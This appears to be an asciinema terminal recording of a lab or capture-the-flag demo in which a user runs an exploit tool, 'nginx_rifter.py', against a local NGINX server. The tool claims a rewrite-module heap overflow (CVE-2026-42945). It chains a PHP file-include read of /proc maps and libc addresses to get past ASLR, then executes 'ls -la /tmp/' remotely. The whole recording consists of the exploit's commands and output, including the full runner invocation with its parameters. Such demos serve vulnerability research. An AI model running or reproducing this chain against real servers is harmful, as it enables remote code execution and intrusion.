{"version":3,"term":{"cols":156,"rows":47,"type":"xterm-256color","version":"iTerm2 3.6.10","theme":{"fg":"#8df77a","bg":"#000000","palette":"#000000:#b93019:#52c037:#c7c53e:#0c24c0:#ba3ec1:#53c3c6:#c7c7c7:#686868:#f0776d:#8df77a:#fffc7f:#6a71f7:#f17ff9:#8efafe:#ffffff"}},"timestamp":1778823742,"env":{"SHELL":"/opt/homebrew/bin/fish"}}
[0.103, "o", "\u001b]1337;RemoteHost=hamid@MacBook-Pro.local\u0007\u001b]1337;CurrentDir=/Users/hamid/Downloads/temp/nginx-rift/Nginx-Rift\u0007"]
[0.000, "o", "\u001b]1337;ShellIntegrationVersion=19;shell=fish\u0007"]
[0.002, "o", "\u001b[?u\u001b[>0q\u001b]11;?\u001b\\\u001b[?1049h\u001bP+q696e646e\u001b\\\u001bP+q71756572792d6f732d6e616d65\u001b\\\u001b[?1049l\u001b[0c"]
[0.051, "o", "\r"]
[0.000, "o", "\u001b[38;2;102;102;102m"]
[0.004, "o", "Darwin MacBook-Pro.local 25.5.0 arm64\r\n"]
[0.003, "o", " 7:42  up 1 day, 19:11, 15 users, load averages: 7.79 6.12 5.20\r\n"]
[0.000, "o", "\u001b[m"]
[0.012, "o", "\u001b[6 q"]
[0.000, "o", "\u001b]7;file://MacBook-Pro.local/Users/hamid/Downloads/temp/nginx-rift/Nginx-Rift\u0007"]
[0.084, "o", "\u001b]0;fish ~/D/t/n/Nginx-Rift\u0007\u001b[m\u001b]11;?\u001b\\\u001b[6n\u001b[0c\u001b[?2004h\u001b[?2031h\u001b[=5u"]
[0.000, "o", "\u001b]133;A;click_events=1\u001b\\\u001b]133;D;0\u0007\u001b]1337;RemoteHost=hamid@MacBook-Pro.local\u0007\u001b]1337;CurrentDir=/Users/hamid/Downloads/temp/nginx-rift/Nginx-Rift\u0007\u001b]133;A\u0007\u001b[m\u001b[38;2;153;153;153;48;2;51;51;51m ~/D/t/n/\u001b[38;2;255;255;255;48;2;51;51;51;1mNginx-Rift \u001b[m\u001b[38;2;12;72;1;48;2;173;220;16m\u001b[38;2;51;51;51m \u001b[38;2;12;72;1m ctf-remote-aslr-lfi … \u001b[m\u001b[m\u001b[38;2;173;220;16m \u001b[m\u001b]133;B\u0007\u001b]133;B\u0007\u001b[38;2;178;178;178m\u001b[K\r\u001b[48C"]
[0.650, "o", "\u001b[?2004l\u001b[?2031l\u001b[=0u"]
[0.005, "o", "\u001b[?2004h\u001b[?2031h\u001b[=5u"]
[0.000, "o", "asciinema r ./demo4.cast --overwrite\r\u001b[84C"]
[0.000, "o", "\u001b[36D\u001b[39masciinema\u001b[38;2;178;178;178m \u001b[38;2;204;204;255mr\u001b[38;2;178;178;178m \u001b[38;2;204;204;255;4m./demo4.cast\u001b[38;2;178;178;178;24m \u001b[38;2;204;204;255m--overwrite\u001b[38;2;178;178;178m\r\u001b[84C"]
[0.267, "o", "\u001b[?2004l\u001b[?2031l\u001b[=0u"]
[0.000, "o", "\u001b[?2004h\u001b[?2031h\u001b[=5u"]
[0.000, "o", "\u001b[36Dasciinema r ./demo4.cast\u001b[K\r\u001b[72C"]
[0.001, "o", "\u001b[24D\u001b[39masciinema\u001b[38;2;178;178;178m \u001b[38;2;204;204;255mr\u001b[38;2;178;178;178m \u001b[38;2;204;204;255;4m./demo4.cast\u001b[38;2;178;178;178;24m\r\u001b[72C"]
[0.392, "o", "\u001b[?2004l\u001b[?2031l\u001b[=0u"]
[0.001, "o", "\u001b[?2004h\u001b[?2031h\u001b[=5u"]
[0.000, "o", "\u001b[24Dclear\u001b[K\r\u001b[53C"]
[0.000, "o", "\u001b[5D\u001b[39mclear\u001b[38;2;178;178;178m\r\u001b[53C"]
[0.373, "o", "\u001b[?2004l\u001b[?2031l\u001b[=0u"]
[0.001, "o", "\u001b[?2004h\u001b[?2031h\u001b[=5u"]
[0.000, "o", "\u001b[5D./nginx_rifter.py --target 192.168.1.205:19321 --exploit --cmd \"ls -la\"\r\u001b[119C"]
[0.000, "o", "\u001b[71D\u001b[39m./nginx_rifter.py\u001b[38;2;178;178;178m \u001b[38;2;204;204;255m--target\u001b[38;2;178;178;178m \u001b[38;2;204;204;255m192.168.1.205:19321\u001b[38;2;178;178;178m \u001b[38;2;204;204;255m--exploit\u001b[38;2;178;178;178m \u001b[38;2;204;204;255m--cmd\u001b[38;2;178;178;178m \u001b[38;2;156;231;129m\"ls -la\"\u001b[38;2;178;178;178m\r\u001b[119C"]
[2.599, "o", "\r\u001b[118C"]
[0.000, "o", "\r\u001b[118C"]
[0.656, "o", "\u001b[38;2;156;231;129m \"\u001b[38;2;178;178;178m\r\u001b[119C"]
[0.360, "o", "\u001b[38;2;156;231;129m/\"\u001b[38;2;178;178;178m\r\u001b[120C"]
[0.254, "o", "\u001b[38;2;156;231;129mt\"\u001b[38;2;178;178;178m\r\u001b[121C"]
[0.044, "o", "\u001b[38;2;156;231;129mm\"\u001b[38;2;178;178;178m\r\u001b[122C"]
[0.103, "o", "\u001b[38;2;156;231;129mp\"\u001b[38;2;178;178;178m\r\u001b[123C"]
[1.243, "o", "\u001b[38;2;156;231;129m/\"\u001b[38;2;178;178;178m\r\u001b[124C"]
[0.593, "o", "\u001b[?2004l\u001b[?2031l\u001b[=0u"]
[0.000, "o", "\r\u001b[125C\r\n"]
[0.000, "o", "\u001b[m\u001b]133;C;cmdline_url=./nginx_rifter.py%20--target%20192.168.1.205%3A19321%20--exploit%20--cmd%20%22ls%20-la%20/tmp/%22\u0007"]
[0.000, "o", "\u001b]133;C;\r\u0007"]
[0.000, "o", "\u001b[2 q"]
[0.001, "o", "\u001b]0;./nginx_rifter.py ~/D/t/n/Nginx-Rift\u0007\u001b[m\r"]
[0.138, "o", "\r\n\u001b[1m\u001b[36mnginx_rifter v2.0 - NGINX Rift assessor\u001b[0m\u001b[0m\r\n\u001b[2m==============================================================================\u001b[0m\r\nBug:      \u001b[1mCVE-2026-42945\u001b[0m - NGINX rewrite-module heap buffer overflow\r\nCause:    rewrite/set args-escaping length/copy mismatch\r\nTarget:   \u001b[1m192.168.1.205:19321\u001b[0m\r\nFileRead: /lfi.php?file=<path>\r\nDefault:  assessment only; pass --exploit --cmd ... for the crashing exploit path\r\nFixed:    NGINX OSS 1.30.1 / 1.31.0; NGINX Plus R36 P4 / R35 P2 / R32 P6\r\n\u001b[2m==============================================================================\u001b[0m\r\n\r\n"]
[0.111, "o", "\r\n\u001b[1m\u001b[36m[01] HTTP And Transport\u001b[0m\u001b[0m\r\n\u001b[2m------------------------------------------------------------------------------\u001b[0m\r\n    \u001b[2mbase URL:                     \u001b[0m http://192.168.1.205:19321\r\n    \u001b[2mHTTP:                         \u001b[0m \u001b[32m200 OK\u001b[0m\r\n    \u001b[2mServer:                       \u001b[0m nginx/1.31.0\r\n    \u001b[2mHTTP/2 cleartext:             \u001b[0m \u001b[32myes\u001b[0m\r\n"]
[0.000, "o", "\r\n\u001b[1m\u001b[36m[02] File-Read Primitive\u001b[0m\u001b[0m\r\n\u001b[2m------------------------------------------------------------------------------\u001b[0m\r\n    \u001b[2msmall text read:              \u001b[0m \u001b[32mTrue\u001b[0m\r\n    \u001b[2mbinary read:                  \u001b[0m \u001b[32mTrue\u001b[0m\r\n    \u001b[2mranged reads:                 \u001b[0m \u001b[32mTrue\u001b[0m\r\n    \u001b[2m/proc/self/status:            \u001b[0m \u001b[32mTrue\u001b[0m\r\n"]
[0.000, "o", "    \u001b[2m/proc/self/maps:              \u001b[0m \u001b[32mTrue\u001b[0m\r\n\r\n\u001b[1m\u001b[36m[03] OS And Worker Discovery\u001b[0m\u001b[0m\r\n\u001b[2m------------------------------------------------------------------------------\u001b[0m\r\n    \u001b[2mOS:                           \u001b[0m Ubuntu 22.04.3 LTS\r\n    \u001b[2mkernel:                       \u001b[0m 5.15.0-84-generic\r\n"]
[0.000, "o", "    \u001b[2mASLR:                         \u001b[0m \u001b[32m2\u001b[0m\r\n"]
[0.000, "o", "    \u001b[2mcore_pattern:                 \u001b[0m \u001b[32mcore\u001b[0m\r\n    \u001b[2msuid_dumpable:                \u001b[0m \u001b[32m2\u001b[0m\r\n    \u001b[2mworker maps:                  \u001b[0m \u001b[32mreadable\u001b[0m\r\n    \u001b[2mnginx worker PID:             \u001b[0m 3480\r\n    \u001b[2mnginx path:                   \u001b[0m /nginx-src/build/nginx\r\n    \u001b[2mnginx rw base:                \u001b[0m 0x55e420b83000\r\n    \u001b[2mlibc base:                    \u001b[0m 0x7fca47a6d000\r\n    \u001b[2msystem():                     \u001b[0m \u001b[32m0x7fca47abdd70\u001b[0m\r\n"]
[0.000, "o", "\r\n\u001b[1m\u001b[36m[04] Binary Fingerprints\u001b[0m\u001b[0m\r\n\u001b[2m------------------------------------------------------------------------------\u001b[0m\r\n"]
[0.000, "o", "    \u001b[2mnginx build-id:               \u001b[0m \u001b[32m060e053ab1fa1a2876b7fe0ff4eff0cc777857b6\u001b[0m\r\n"]
[0.000, "o", "    \u001b[2mnginx sha256:                 \u001b[0m 14bebe8937678598b8ebb8449f8c1554\r\n    \u001b[2mlibc build-id:                \u001b[0m \u001b[32m095c7ba148aeca81668091f718047078d57efddb\u001b[0m\r\n    \u001b[2mlibc sha256:                  \u001b[0m c53819710b163d3f1d2541778590d58d\r\n    \u001b[2mlibc dpkg:                    \u001b[0m 2.35-0ubuntu3.13\r\n"]
[0.000, "o", "\r\n\u001b[1m\u001b[36m[05] Nginx Config Discovery\u001b[0m\u001b[0m\r\n"]
[0.000, "o", "\u001b[2m------------------------------------------------------------------------------\u001b[0m\r\n"]
[0.000, "o", "    \u001b[2mconfigs read:                 \u001b[0m \u001b[32m1\u001b[0m\r\n"]
[0.000, "o", "    \u001b[2m/app/nginx-lfi.conf:          \u001b[0m 2879 bytes sha256=22026f67f6a7d025\r\n    \u001b[2mrewrite/set candidates:       \u001b[0m \u001b[32m1\u001b[0m\r\n    \u001b[32m[candidate]\u001b[0m /app/nginx-lfi.conf:37 location ~ ^/api/(.*)$\r\n        rewrite: ^/api/(.*)$ /internal?migrated=true\r\n        set:     $original_endpoint PPPPPPPPPPP$1\r\n\r\n\u001b[1m\u001b[36m[06] Exploit-Chain Viability\u001b[0m\u001b[0m\r\n\u001b[2m------------------------------------------------------------------------------\u001b[0m\r\n    \u001b[2mHTTP reachable:               \u001b[0m \u001b[32m200\u001b[0m\r\n"]
[0.000, "o", "    \u001b[2mHTTP/2 cleartext victim:      \u001b[0m \u001b[32m{'tested': True, 'ok': True, 'bytes': 49}\u001b[0m\r\n    \u001b[2mfile-read primitive:          \u001b[0m \u001b[32msmall text files readable\u001b[0m\r\n"]
[0.000, "o", "    \u001b[2mranged file reads:            \u001b[0m \u001b[32m{'ok': True, 'first_bytes': 8, 'second_bytes': 8}\u001b[0m\r\n    \u001b[2mbinary file reads:            \u001b[0m \u001b[32m{'path': '/bin/sh', 'ok': True, 'bytes_read': 4, 'sample': '\\x7fELF', 'error': ''}\u001b[0m\r\n    \u001b[2msame-UID nginx worker maps:   \u001b[0m \u001b[32m3480\u001b[0m\r\n    \u001b[2mlibc/system derivation:       \u001b[0m \u001b[32m0x7fca47abdd70\u001b[0m\r\n    \u001b[2mnginx config candidate:       \u001b[0m \u001b[32m1 candidate(s)\u001b[0m\r\n    \u001b[2mnginx binary fingerprint:     \u001b[0m \u001b[32m060e053ab1fa1a2876b7fe0ff4eff0cc777857b6\u001b[0m\r\n    \u001b[2mlibc fingerprint:             \u001b[0m \u001b[32m095c7ba148aeca81668091f718047078d57efddb\u001b[0m\r\n    \u001b[2mcore settings compatible:     \u001b[0m \u001b[32mcore_pattern='core', suid_dumpable='2'\u001b[0m\r\n    \u001b[2mpre-existing core readable:   \u001b[0m \u001b[32m4 bytes\u001b[0m\r\n    \u001b[2mverdict:                      \u001b[0m \u001b[32mready-with-lab-like-core-leak\u001b[0m\r\n    \u001b[2mreason:                       \u001b[0m \u001b[32mrequired primitives for the current core-guided chain are present\u001b[0m\r\n"]
[0.000, "o", "\r\n\u001b[1m\u001b[36m[07] Assessment Artifact\u001b[0m\u001b[0m\r\n\u001b[2m------------------------------------------------------------------------------\u001b[0m\r\n    \u001b[2mpath:                         \u001b[0m \u001b[32martifacts/nginx_rifter_20260515-074230.json\u001b[0m\r\n"]
[0.000, "o", "\r\n\u001b[1m\u001b[36m[08] Explicit Exploit Handoff\u001b[0m\u001b[0m\r\n\u001b[2m------------------------------------------------------------------------------\u001b[0m\r\n    \u001b[2mrunner:                       \u001b[0m demo_ctf_exploit_v1_9.py\r\n"]
[0.000, "o", "    \u001b[2mcommand:                      \u001b[0m /Users/hamid/.pyenv/versions/3.12.0/bin/python3 /Users/hamid/Downloads/temp/nginx-rift/Nginx-Rift/demo_ctf_exploit_v1_9.py --host 192.168.1.205:19321 --cmd 'ls -la /tmp/' --artifact-dir artifacts --target-profile generic --scheme http --lfi-endpoint /lfi.php --file-param file --offset-param offset --length-param length --phpinfo-path /phpinfo.php --rounds 2\r\n"]
[0.066, "o", "\r\n\u001b[1m\u001b[36mNginx Rift Remote ASLR Lab (v1.9)\u001b[0m\u001b[0m\r\n\u001b[2m============================================================================\u001b[0m\r\nBug:      \u001b[1mCVE-2026-42945\u001b[0m - NGINX rewrite-module heap buffer overflow\r\nCause:    rewrite/set args-escaping length/copy mismatch\r\n"]
[0.000, "o", "Target:   \u001b[1m192.168.1.205:19321\u001b[0m; vulnerable route /api/...\r\nProfile:  generic\r\n"]
[0.000, "o", "File read:  /lfi.php?file=<path>\r\nRoutes:   phpinfo /phpinfo.php; HTTP/2 victim on the same listener\r\n"]
[0.000, "o", "Chain:    PHP LFI -> worker maps/libc -> readable core -> h2 cleanup overwrite\r\nASLR:     enabled; process-specific bases and final candidates are derived remotely\r\n"]
[0.000, "o", "Command:  ls -la /tmp/\r\nOutput:   compact operator view; pass -v for probe trace\r\nFixed:    NGINX OSS 1.30.1 / 1.31.0; NGINX Plus R36 P4 / R35 P2 / R32 P6\r\n\u001b[2m============================================================================\u001b[0m\r\n\r\n"]
[0.325, "o", "    \u001b[2mrunner version:\u001b[0m    \u001b[32mv1.9 autonomous demo runner\u001b[0m\r\n"]
[0.064, "o", "\r\n\u001b[1m\u001b[34m[01] Remote target preflight\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.172, "o", "\u001b[2m+000.6s\u001b[0m \u001b[32m[+]\u001b[0m HTTP/1.1 listener is alive\r\n"]
[0.167, "o", "\u001b[2m+000.7s\u001b[0m \u001b[32m[+]\u001b[0m HTTP/2 returned 49 bytes\r\n"]
[0.180, "o", "    \u001b[2mtarget profile:\u001b[0m    generic\r\n"]
[0.069, "o", "    \u001b[2mrandomize_va_space:\u001b[0m \u001b[32m2\u001b[0m\r\n"]
[0.066, "o", "    \u001b[2mcore_pattern:\u001b[0m      \u001b[32mcore\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2msuid_dumpable:\u001b[0m     \u001b[32m2\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mos release:\u001b[0m        Ubuntu 22.04.3 LTS\r\n"]
[0.070, "o", "    \u001b[2mnginx master PID:\u001b[0m  3044\r\n"]
[0.069, "o", "    \u001b[2mworker children:\u001b[0m   3480\r\n"]
[0.066, "o", "\r\n\u001b[1m\u001b[34m[02] Remote ASLR discovery through PHP LFI\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.175, "o", "    \u001b[2mnginx worker PID:\u001b[0m  \u001b[33m3480\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mnginx writable map:\u001b[0m \u001b[35m0x55e420b83000\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mlibc base:\u001b[0m         \u001b[35m0x7fca47a6d000\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2msystem() address:\u001b[0m  \u001b[32m0x7fca47abdd70\u001b[0m\r\n"]
[0.140, "o", "\r\n\u001b[1m\u001b[34m[03] Remote Version Fingerprint\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.165, "o", "    \u001b[2mOS:\u001b[0m                \u001b[32mUbuntu 22.04.3 LTS\u001b[0m\r\n"]
[0.064, "o", "    \u001b[2mOS codename:\u001b[0m       jammy\r\n"]
[0.067, "o", "    \u001b[2mkernel release:\u001b[0m    \u001b[32m5.15.0-84-generic\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mHTTP Server:\u001b[0m       \u001b[32mnginx/1.31.0\u001b[0m\r\n"]
[0.065, "o", "    \u001b[2mPHP version:\u001b[0m       \u001b[32m8.1.2-1ubuntu2.23\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mPHP Server API:\u001b[0m    FPM/FastCGI\r\n"]
[0.068, "o", "    \u001b[2mnginx binary versions:\u001b[0m \u001b[32mnginx/1.31.0\u001b[0m\r\n"]
[0.067, "o", "    \u001b[2mnginx build-id:\u001b[0m    060e053ab1fa1a2876b7fe0ff4eff0cc777857b6\r\n"]
[0.069, "o", "    \u001b[2mnginx sha256:\u001b[0m      14bebe8937678598b8ebb8449f8c1554\r\n"]
[0.066, "o", "    \u001b[2mlibc dpkg version:\u001b[0m \u001b[32m2.35-0ubuntu3.13\u001b[0m\r\n"]
[0.066, "o", "    \u001b[2mglibc symbol range:\u001b[0m GLIBC_2.2.5 .. GLIBC_2.35\r\n"]
[0.065, "o", "    \u001b[2mlibc build-id:\u001b[0m     095c7ba148aeca81668091f718047078d57efddb\r\n"]
[0.068, "o", "    \u001b[2mlibc sha256:\u001b[0m       c53819710b163d3f1d2541778590d58d\r\n"]
[0.071, "o", "\r\n\u001b[1m\u001b[34m[04] Remote command verification setup\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.165, "o", "    \u001b[2mmarker path:\u001b[0m       \u001b[33m/tmp/nginx_rift_demo_v1_9_51c3b213814e\u001b[0m\r\n"]
[0.065, "o", "    \u001b[2mexec command:\u001b[0m      \u001b[32mls -la /tmp/\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mexploit rounds:\u001b[0m    2\r\n"]
[0.064, "o", "\r\n\u001b[1m\u001b[34m[05] Exploit round 1/2: calibration probes\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.165, "o", "\u001b[2m+003.5s\u001b[0m \u001b[36m[*]\u001b[0m testing up to 12 geometry candidate(s)\r\n"]
[3.256, "o", "\u001b[2m+006.7s\u001b[0m \u001b[32m[+]\u001b[0m selected geometry A=127, plus=962 with 60 ranked candidate(s)\r\n"]
[0.164, "o", "\r\n\u001b[1m\u001b[34m[06] Worker reset and fresh address derivation\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[2.978, "o", "\u001b[2m+009.9s\u001b[0m \u001b[32m[+]\u001b[0m nginx worker recovered\r\n"]
[0.471, "o", "\u001b[2m+010.4s\u001b[0m \u001b[32m[+]\u001b[0m using 60 candidates from the fresh reset core\r\n"]
[0.165, "o", "    \u001b[2mfinal payload size:\u001b[0m 340\r\n"]
[0.069, "o", "    \u001b[2mcandidate sanity kept:\u001b[0m \u001b[32m50\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mcandidate sanity dropped:\u001b[0m \u001b[33m10\u001b[0m\r\n"]
[0.066, "o", "\r\n\u001b[1m\u001b[34m[07] Final exploit attempts for A=127, plus=962\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[1.519, "o", "\r\n\u001b[1m\u001b[34m[08] Result\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.165, "o", "\u001b[2m+012.4s\u001b[0m \u001b[32m[+]\u001b[0m CTF WIN: marker token was read back through LFI\r\n"]
[0.164, "o", "    \u001b[2mwinning address:\u001b[0m   \u001b[32m0x55e4210b2127\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mwinning body offset:\u001b[0m \u001b[32m1376\u001b[0m\r\n"]
[0.067, "o", "    \u001b[2mmarker path:\u001b[0m       \u001b[33m/tmp/nginx_rift_demo_v1_9_51c3b213814e\u001b[0m\r\n"]
[0.068, "o", "    \u001b[2mrun artifact:\u001b[0m      artifacts/demo_v1_9_20260515-074234.json\r\n"]
[0.067, "o", "\r\n\u001b[1m\u001b[34m[09] Command Output\u001b[0m\u001b[0m\r\n\u001b[2m----------------------------------------------------------------------------\u001b[0m\r\n"]
[0.161, "o", "    \u001b[2mexec command:\u001b[0m      \u001b[35mls -la /tmp/\u001b[0m\r\n"]
[0.068, "o", "    \u001b[2mcaptured bytes:\u001b[0m    \u001b[35m1948\u001b[0m\r\n"]
[0.069, "o", "    \u001b[2mdisplay:\u001b[0m           \u001b[35mcomplete\u001b[0m\r\n"]
[0.069, "o", "\r\n\u001b[1;96mtotal 92\r\ndrwxrwxrwt 14 root   root    4096 May 15 05:42 .\r\ndrwxr-xr-x 22 root   root    4096 May 14 21:20 ..\r\ndrwxrwxrwt  2 root   root    4096 May 14 23:37 .ICE-unix\r\ndrwxrwxrwt  2 root   root    4096 May 14 23:37 .Test-unix\r\ndrwxrwxrwt  2 root   root    4096 May 14 23:37 .X11-unix\r\ndrwxrwxrwt  2 root   root    4096 May 14 23:37 .XIM-unix\r\ndrwxrwxrwt  2 root   root    4096 May 14 23:37 .font-unix\r\n-rw-r--r--  1 nobody nogroup   32 May 14 23:40 nginx_rift_demo_0c6b37fbf41e\r\n-rw-r--r--  1 nobody nogroup   32 May 15 02:54 nginx_rift_demo_66365a430929\r\n-rw-r--r--  1 nobody nogroup   32 May 15 02:51 nginx_rift_demo_6be310ae8b4b\r\n-rw-r--r--  1 nobody nogroup   32 May 15 02:53 nginx_rift_demo_e2f62b4ef7bd\r\n-rw-r--r--  1 nobody nogroup   32 May 15 03:05 nginx_rift_demo_v1_1_3152de9158ba\r\n-rw-r--r--  1 nobody nogroup   32 May 15 03:03 nginx_rift_demo_v1_1_d4c535c85f46\r\n-rw-r--r--  1 nobody nogroup   32 May 15 03:13 nginx_rift_demo_v1_3_c311666d79ef\r\n-rw-r--r--  1 nobody nogroup   32 May 15 03:15 nginx_rift_"]
[0.000, "o", "demo_v1_4_d5399fb5020b\r\n-rw-r--r--  1 nobody nogroup   32 May 15 03:17 nginx_rift_demo_v1_5_93b71d6098e9\r\n-rw-------  1 nobody nogroup    0 May 15 05:42 nginx_rift_demo_v1_9_51c3b213814e\r\ndrwx------  3 root   root    4096 May 14 23:37 snap-private-tmp\r\ndrwx------  3 root   root    4096 May 14 23:37 systemd-private-3c4fc88e428c4d1a8be7eb1faf2cd0d7-ModemManager.service-ukq8Pi\r\ndrwx------  3 root   root    4096 May 14 23:37 systemd-private-3c4fc88e428c4d1a8be7eb1faf2cd0d7-haveged.service-vyQC0V\r\ndrwx------  3 root   root    4096 May 14 23:37 systemd-private-3c4fc88e428c4d1a8be7eb1faf2cd0d7-systemd-logind.service-hIc6MM\r\ndrwx------  3 root   root    4096 May 14 23:37 systemd-private-3c4fc88e428c4d1a8be7eb1faf2cd0d7-systemd-resolved.service-548jj0\r\ndrwx------  3 root   root    4096 May 14 23:37 systemd-private-3c4fc88e428c4d1a8be7eb1faf2cd0d7-systemd-timesyncd.service-2FZUqd\r\ndrwx------  2 root   root    4096 May 14 23:37 vmware-root_639-3988031840\u001b[0m\r\n"]
[0.022, "o", "\u001b]133;D;0\u0007"]
[0.000, "o", "\u001b[6 q"]
[0.000, "o", "\u001b[?25h"]
[0.000, "o", "\u001b[2m⏎\u001b[m                                                                                                                                                           \r⏎ \r\u001b[K"]
[0.000, "o", "\u001b]7;file://MacBook-Pro.local/Users/hamid/Downloads/temp/nginx-rift/Nginx-Rift\u0007"]
[0.084, "o", "\u001b]0;fish ~/D/t/n/Nginx-Rift\u0007\u001b[m\u001b]11;?\u001b\\\u001b[6n\u001b[0c\u001b[?2004h\u001b[?2031h\u001b[=5u"]
[0.000, "o", "\u001b]133;A;click_events=1\u0007\u001b]133;D;0\u0007\u001b]1337;RemoteHost=hamid@MacBook-Pro.local\u0007\u001b]1337;CurrentDir=/Users/hamid/Downloads/temp/nginx-rift/Nginx-Rift\u0007\u001b]133;A\u0007\u001b[m\u001b[38;2;153;153;153;48;2;51;51;51m ~/D/t/n/\u001b[38;2;255;255;255;48;2;51;51;51;1mNginx-Rift \u001b[m\u001b[38;2;12;72;1;48;2;173;220;16m\u001b[38;2;51;51;51m \u001b[38;2;12;72;1m ctf-remote-aslr-lfi … \u001b[m\u001b[m\u001b[38;2;173;220;16m \u001b[m\u001b]133;B\u0007\u001b]133;B\u0007\u001b[38;2;178;178;178m\u001b[K\r\u001b[151C\u001b[38;2;102;102;102m13.5s\u001b[38;2;178;178;178m\u001b[38;2;102;102;102m\u001b[m\r\u001b[151C\r\u001b[48C"]
[2.507, "o", "\u001b[?2004l\u001b[?2031l\u001b[=0u\r\n"]
[0.000, "o", "\u001b[m"]
[0.000, "o", "\u001b[m"]
[0.000, "o", "\u001b[2 q"]
[0.001, "x", "0"]
